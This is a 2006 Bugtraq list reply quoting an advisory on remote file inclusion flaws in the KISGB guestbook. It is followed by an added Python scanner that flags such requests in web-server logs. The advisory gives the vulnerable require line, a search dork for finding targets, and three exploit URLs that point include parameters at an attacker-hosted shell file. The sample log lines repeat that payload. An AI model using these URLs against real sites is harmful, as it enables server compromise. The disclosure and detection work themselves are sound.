bugtraq

Re: Multiple Remote Vulnerabilities in KISGB

To: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@gmail.com>
Subject: Re: Multiple Remote Vulnerabilities in KISGB
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Date: Sat, 23 Dec 2006 00:00:06 +0300
Cc: bugtraq@zone-h.org, bugtraq@securityfocus.com, org@security.nnov.ru, full-disclosure@lists.grok.org.uk, <admin@zone-h.org>, <vuln@secunia.com>, <submit@milw0rm.com>
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
In-reply-to: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
Organization: http://www.security.nnov.ru
References: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
Reply-to: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Dear 0o_zeus_o0 elitemexico.org,

 Thanks, published. http://www.security.nnov.ru/source13365.html

--Friday, December 22, 2006, 11:55:17 PM, you wrote to bugtraq@zone-h.org:

0eo> ###########################################################################
0eo> # Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
0eo> #
0eo> # Author: 0o_zeus_o0 ( Arturo Z. )
0eo> # Contact: zeus@diosdelared.com
0eo> # Website: www.diosdelared.com
0eo> # Date: 22/12/06
0eo> # Risk: critical
0eo> # Vendor Url: http://sourceforge.net/projects/kisgb, http://ravenphpscripts.com
0eo> # Affected Software: Keep It Simple Guest Book
0eo> # search: inurl:kisgb , intitle:KISGB
0eo> #
0eo> #Info:
0eo> ##################################################################
0eo> #Bug is risky since it is possible to include malicious code
0eo> #that allows one to view or modify files
0eo> #code:
0eo> #if (isset($default_path_for_themes))
0eo> #    require("$default_path_for_themes/$theme");
0eo> #else require("$path_to_themes/$theme");
0eo> ##################################################################
0eo> #
0eo> #
0eo> #http://site/path/gbpath/authenticate.php?path_to_themes=http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/admin.php?default_path_for_themes=http://shellsite.com/php.gif?
0eo> #
0eo> #http://site/path/gbpath/upconfig.php?default_path_for_themes=http://shellsite.com/php.gif?
0eo> ##################################################################
0eo> #VULNERABLE VERSIONS
0eo> ##################################################################
0eo> # 5.0.0
0eo> #
0eo> ##################################################################
0eo> #Contact information
0eo> #0o_zeus_o0
0eo> #zeus@diosdelared.com
0eo> #www.diosdelared.com
0eo> ##################################################################
0eo> #greetz: S.S.M, sams, a mi beba
0eo> #Original Advisory: http://diosdelared.com/15.txt
0eo> ##################################################################


-- 
~/ZARAZA
Firing a second time, he crippled a bystander. I was the bystander. (Twain)
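As an added example, not part of the original advisory or of KISGB, the following Python scans constructed web-server access-log lines for requests to the three scripts named above whose include-path parameters carry a remote URL (the pattern the advisory shows) or a directory-traversal sequence; the script names, parameter names, addresses and host are placeholders taken from or modelled on the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts and include-path parameters named in the advisory.
KISGB_SCRIPTS = {"authenticate.php", "admin.php", "upconfig.php"}
INCLUDE_PARAMS = ("path_to_themes", "default_path_for_themes", "theme")

# Common Log Format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def suspicious_value(value: str) -> bool:
    """True if a value meant to be a local theme path points elsewhere."""
    v = unquote(value).strip().lower()  # also unwraps double-encoded input
    remote = re.match(r"^[a-z][a-z0-9+.-]*://", v) is not None or v.startswith("//")
    traversal = ".." in v
    return remote or traversal

def check_request(target: str):
    """Return (script, param, value) for a KISGB request with a bad include path, else None."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in KISGB_SCRIPTS:
        return None
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    for name in INCLUDE_PARAMS:
        for value in query.get(name, []):
            if suspicious_value(value):
                return (script, name, value)
    return None

def scan_log(lines):
    """Return (ip, script, param, value) for every log line that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (finding := check_request(m.group("target"))):
            hits.append((m.group("ip"),) + finding)
    return hits

# Constructed sample log (TEST-NET addresses, .example host); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Dec/2006:23:55:17 +0300] "GET /gb/admin.php?default_path_for_themes=http://shellsite.example/php.gif? HTTP/1.0" 200 512',
    '198.51.100.9 - - [22/Dec/2006:23:56:02 +0300] "GET /gb/authenticate.php?path_to_themes=%68ttp%3A%2F%2Fshellsite.example%2Fphp.gif%3F HTTP/1.1" 200 301',
    '192.0.2.4 - - [22/Dec/2006:23:57:41 +0300] "GET /gb/admin.php?theme=blue.php HTTP/1.1" 200 2048',
    '192.0.2.5 - - [22/Dec/2006:23:58:10 +0300] "GET /gb/index.php?page=http://other.example/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the first two sample lines are reported: a plain remote URL and a percent-encoded one; the legitimate theme name and the request to a script not named in the advisory are ignored.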

